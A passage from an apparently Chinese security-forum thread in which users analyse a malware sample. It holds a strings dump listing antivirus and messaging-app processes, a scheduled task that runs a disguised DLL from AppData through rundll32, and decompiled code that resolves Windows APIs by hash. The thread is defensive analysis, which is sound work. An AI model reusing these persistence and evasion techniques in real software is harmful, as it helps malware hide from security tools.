  88. [UNICODE] 0x00003736: 蠀QQPCMgr.exe
  89. [UNICODE] 0x0000375e: 蠀TenSafe.exe
  90. [UNICODE] 0x00003786: 蠀Hips Software
  91. [UNICODE] 0x000037ae: 蠀kxetray.exe
  92. [UNICODE] 0x000037d6: 耀OneDrive.exe
  93. [UNICODE] 0x000037fe: 蠀MsASCui.exe
  94. [UNICODE] 0x00003826: 蠀360rps.exe
  95. [UNICODE] 0x0000384e: 蠀Kaspersky
  96. [UNICODE] 0x00003876: 耀dllhost.exe
  97. [UNICODE] 0x0000389e: 耀svchost.exe
  98. [UNICODE] 0x000038c6: 蠀LINE.exe
  99. [UNICODE] 0x000038ee: 蠀WhatsApp.exe
  100. [UNICODE] 0x00003916: 蠀WdMpService.exe
  101. [UNICODE] 0x0000393e: 蠀WhatsApp
  102. [UNICODE] 0x00003966: 蠀WdBoot.exe
  103. [UNICODE] 0x0000398e: 蠀AYAgent.exe
  104. [UNICODE] 0x000039b6: 蠀QQPCRt.exe
  105. [UNICODE] 0x000039de: 蠀v3l4sp.exe
  106. [UNICODE] 0x00003a06: 蠀WdNisSvc.exe
  107. [UNICODE] 0x00003a2e: 蠀QQPCTray.exe
  108. [UNICODE] 0x00003a56: 耀whatsapp.exe
  109. [UNICODE] 0x00003a7e: 蠀Telegram
  110. [UNICODE] 0x00003aa6: 耀telegram.exe
  111. [UNICODE] 0x00003ace: 耀wechat.exe
  112. [UNICODE] 0x00003af6: 耀line.exe
  113. [UNICODE] 0x00003b1e: 耀telegram.exe
  114. [UNICODE] 0x00003b46: 耀telegram.exe
  115. [UNICODE] 0x00003b6e: 耀line.exe
  116. [UNICODE] 0x00003b9c: device
  117. [UNICODE] 0x00003baa: dero
  118. [UNICODE] 0x00003bca: arcadero
  119. [UNICODE] 0x00003bec: embarcadero
  120. [UNICODE] 0x00003c0e: 蠀Telegram.exe
  121. [UNICODE] 0x00003c36: 耀dllhost.exe
  122. [UNICODE] 0x00003c64: embarcadero
  123. [UNICODE] 0x00003c86: 耀telegram.exe
  124. [UNICODE] 0x00003cd6: 耀notepad.exe
  125. [UNICODE] 0x00003cfe: 耀onedrive.exe
  126. [UNICODE] 0x00003f86: 尺楗摮睯s
  127. [UNICODE] 0x00004ee8: _RET_LOGIN
  128. [UNICODE] 0x00004f58: A0886BCD-A0EE-42C5-B0B1-326A783A07BC
  129. [UNICODE] 0x00004fa8: Unknow
  130. [UNICODE] 0x000051b0: 火绒安全分析工具
  131. [UNICODE] 0x000053b8: 0 min
  132. [UNICODE] 0x000054b8: DESKTOP-AACHFF8
  133. [UNICODE] 0x000056b8: 0x64
  134. [UNICODE] 0x00005c4c: #000000
  135. [UNICODE] 0x00005c62: 2025-10-19 16:04
  136. [UNICODE] 0x00005cc6: C:\Windows\SysWOW64\regsvr32.exe
  137. [UNICODE] 0x0000acfe: 耀NYIRNWRG
  138. [UNICODE] 0x0000ad5e: 耀NYIRNWRG
  139. [UNICODE] 0x0000ad7e: 耀NYIRNWRG
  140. [UNICODE] 0x0000ad9e: 耀NYIRNWRG
  141. [UNICODE] 0x0000adde: 耀NYIRNWRG
  142. [UNICODE] 0x0000adfe: 耀NYIRNWRG
  143. [UNICODE] 0x0000ae5e: 耀NYIRNWRG
  144. [UNICODE] 0x0000ae7e: 耀NYIRNWRG
  145. [UNICODE] 0x0000ae9e: 耀r.exe
  146. [UNICODE] 0x0000aebe: 耀NYIRNWRG
  147. [UNICODE] 0x0000aefe: 耀NYIRNWRG
  148. [UNICODE] 0x0000af3e: 耀NYIRNWRG
  149. [UNICODE] 0x0000af5e: 耀NYIRNWRG
  150. [UNICODE] 0x0000af7e: 耀NYIRNWRG
  151. [UNICODE] 0x0000af9e: 耀NYIRNWRG
  152. [UNICODE] 0x0000afbe: 耀exe
  153. [UNICODE] 0x0000afde: 耀NYIRNWRG
  154. [UNICODE] 0x0000b01e: 耀NYIRNWRG
  155. [UNICODE] 0x0000b03e: 耀NYIRNWRG
  156. [UNICODE] 0x0000b05e: 耀NYIRNWRG
  157. [UNICODE] 0x0000b09e: 耀NYIRNWRG
  158. [UNICODE] 0x0000b19e: 耀dexer.exe
  159. [UNICODE] 0x0000b1de: 耀ession
  160. [UNICODE] 0x0000b2be: 耀r.exe
  161. [UNICODE] 0x0000b2cc: e.exe
  162. [UNICODE] 0x0000b2fe: 耀r.exe
  163. [UNICODE] 0x0000b39e: 耀ker.exe
  164. [UNICODE] 0x0000b3de: 耀r.exe
  165. [UNICODE] 0x0000b43e: 耀eworker.exe
  166. [UNICODE] 0x0000b4c6: 耀整敬牧浡攮數
  167. [UNICODE] 0x0000b4de: 耀楄杮慔歬攮數
  168. [UNICODE] 0x0000b53e: 耀整敬牧浡攮數
  169. [UNICODE] 0x0000b574: users
  170. [UNICODE] 0x0000b5bc: users
  171. [UNICODE] 0x0000b5e6: 耀整敬牧浡攮數
  172. [UNICODE] 0x0000b5fe: 耀楄杮慔歬攮數
  173. [UNICODE] 0x0000b616: 耀敔敬牧浡攮數
  174. [UNICODE] 0x0000b636: 灰攮數s
  175. [UNICODE] 0x0000b65e: 耀敔敬牧浡攮數
  176. [UNICODE] 0x0000b6ee: 耀整敬牧浡攮數s
  177. [UNICODE] 0x0000b70e: 灰攮數s
  178. [UNICODE] 0x0000b754: users
  179. [UNICODE] 0x0000b766: 耀楄杮慔歬攮數s
  180. [UNICODE] 0x0000b77e: 耀楄杮慔歬攮數s
  181. [UNICODE] 0x0000b7ae: 耀敔敬牧浡攮數
  182. [UNICODE] 0x0000b7de: 耀楄杮慔歬攮數
  183. [UNICODE] 0x0000b7fc: users
  184. [UNICODE] 0x0000b826: 耀楄杮慔歬攮數
  185. [UNICODE] 0x0000b844: users
  186. [UNICODE] 0x0000b856: 耀楄杮慔歬攮數
  187. [UNICODE] 0x0000b874: users
  188. [UNICODE] 0x0000b88c: users
复制代码
  1. [UNICODE] 0x00007b18: startOnIdle>false</RestartOnIdle>
  2. [UNICODE] 0x00007b66: </IdleSettings>
  3. [UNICODE] 0x00007b90: <AllowStartOnDem
  4. [UNICODE] 0x00007c68: true</AllowStartOnDemand>
  5. [UNICODE] 0x00007ca6: <Enabled>true</Enabled>
  6. [UNICODE] 0x00007ce0: <Hidden>false</Hidden>
  7. [UNICODE] 0x00007d18: <RunOnlyIfIdle>false</RunOnlyIfIdle>
  8. [UNICODE] 0x00007d6c: <WakeToRun>false</WakeToRun>
  9. [UNICODE] 0x00007db0: <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
  10. [UNICODE] 0x00007e18: <Priority>7</Priority>
  11. [UNICODE] 0x00007e4c: </Settings>
  12. [UNICODE] 0x00007e6a: <Actions>
  13. [UNICODE] 0x00007e88: <Exec>
  14. [UNICODE] 0x00007ea4: <Command>rundll32.exe</Command>
  15. [UNICODE] 0x00007ef2: <Arguments>C:\Users\PC\AppData\Roaming\Embarcadero\AutoRecoverDat.dll,DllRegisterServer</Arguments>
  16. [UNICODE] 0x00007fc4: </Exec>
  17. [UNICODE] 0x00007fda: </Actions>
  18. [UNICODE] 0x00007ff2: </Task>
复制代码
wwwab
发表于 2025-10-19 16:39:02 | 显示全部楼层
C:\Users\PC\AppData\Roaming\Embarcadero\GPUCache2.xml
  1. // positive sp value has been detected, the output may be wrong!
  2. __int64 __fastcall sub_AE4(int a1, __int64 a2, __int64 a3, char a4)
  3. {
  4.   __int64 v4; // rax
  5.   int v5; // r11d
  6.   __int64 v6; // r12
  7.   unsigned __int64 v7; // rdi
  8.   unsigned int v8; // eax
  9.   int v9; // esi
  10.   unsigned int v10; // ebx
  11.   __int64 v11; // rbp
  12.   int v12; // esi
  13.   unsigned __int64 v13; // rax
  14.   int v14; // ebp
  15.   __int64 v15; // rdx
  16.   int v17; // [rsp-10h] [rbp-24h]
  17.   unsigned int v18; // [rsp-Ch] [rbp-20h]
  18.   unsigned int v19; // [rsp-8h] [rbp-1Ch]

  19.   LODWORD(v4) = __readfsdword(0x30u);
  20.   LOBYTE(v4) = v4 | 0x57;
  21.   v7 = *(unsigned int *)(v4 + 12);
  22.   while ( 1 )
  23.   {
  24. LABEL_14:
  25.     v15 = *(unsigned int *)(v7 + 24);
  26.     if ( !(_DWORD)v15 )
  27.       return 0i64;
  28.     v8 = *(_DWORD *)(v7 + 48);
  29.     v9 = 0;
  30.     v10 = *(_DWORD *)(v7 + 44);
  31.     v7 = *(unsigned int *)v7;
  32.     v18 = v7;
  33.     v11 = *(unsigned int *)(*(unsigned int *)(v15 + 60) + v15 + 120);
  34.     v19 = v11;
  35.     if ( (_DWORD)v11 )
  36.     {
  37.       if ( HIWORD(v10) )
  38.       {
  39.         do
  40.         {
  41.           v12 = __ROR4__(v9, 13);
  42.           v17 = *(char *)v8;
  43.           if ( (char)v17 < 97 )
  44.             v9 = v17 + v12;
  45.           else
  46.             v9 = *(char *)v8 - 32 + v12;
  47.         }
  48.         while ( v5 );
  49.         v7 = (unsigned int)v7;
  50.         v11 = (unsigned int)v11;
  51.       }
  52.       v13 = (unsigned int)(v15 + *(_DWORD *)(v15 + v11 + 32));
  53.       if ( *(_DWORD *)(v15 + v11 + 24) )
  54.         break;
  55.     }
  56.   }
  57.   while ( 1 )
  58.   {
  59.     v14 = 0;
  60.     do
  61.       v14 = *(char *)(unsigned int)(v15 + *(_DWORD *)v13) + __ROR4__(v14, 13);
  62.     while ( a4 );
  63.     v7 = v18;
  64.     if ( v9 + v14 == a1 )
  65.       return (unsigned int)(v15
  66.                           + *(_DWORD *)(*(_DWORD *)(v19 + v15 + 28)
  67.                                       + 4 * (unsigned int)*(unsigned __int16 *)(*(unsigned int *)(v19 + v15 + 36) + v15)
  68.                                       + v15));
  69.     v13 = (unsigned int)(v13 + 4);
  70.     if ( !*(_DWORD *)((char *)&loc_10 + 2 * v6) )
  71.       goto LABEL_14;
  72.   }
  73. }
复制代码


似乎是通过哈希值动态解析API导出函数地址的函数。
这马子模块化挺强,一个模块一个Shellcode bin文件
驭龙
发表于 2025-10-19 18:33:54 | 显示全部楼层
wwwab 发表于 2025-10-19 16:26
dll用Enigma(5.X)加壳了,不好分析
一堆空名区段,应该容易被kill

这家伙好像是针对国内环境的小家伙,国内流行的安全软件进程都在其中啊,真是个搞事情的小家伙
神龟Turmi
 楼主| 发表于 2025-10-19 19:53:00 | 显示全部楼层
驭龙 发表于 2025-10-19 18:33
这家伙好像是针对国内环境的小家伙,国内流行的安全软件进程都在其中啊,真是个搞事情的小家伙

很奇怪的是他在加载shellcode之前就有个判断是否有360的步骤 但是那个过程中没有这一堆
似乎是两个不一样的逻辑
驭龙
发表于 2025-10-19 20:01:31 | 显示全部楼层
神龟Turmi 发表于 2025-10-19 19:53
很奇怪的是他在加载shellcode之前就有个判断是否有360的步骤 但是那个过程中没有这一堆
似乎是 ...

也有可能开发者不是一个人,而是东拼西凑的模块?这东西模块化有可能有的模块是搬运?然后就出现前后矛盾的情况?
神龟Turmi
 楼主| 发表于 2025-10-19 20:07:13 | 显示全部楼层
驭龙 发表于 2025-10-19 20:01
也有可能开发者不是一个人,而是东拼西凑的模块?这东西模块化有可能有的模块是搬运?然后就出现前后矛盾 ...

看起来是的,所以我想知道这是什么家族,结果研究了一个下午都没研究明白
(基本排除winos 排除原版gh0strat 基本排除cobaltstrike)
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-15 01:03 , Processed in 0.081798 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表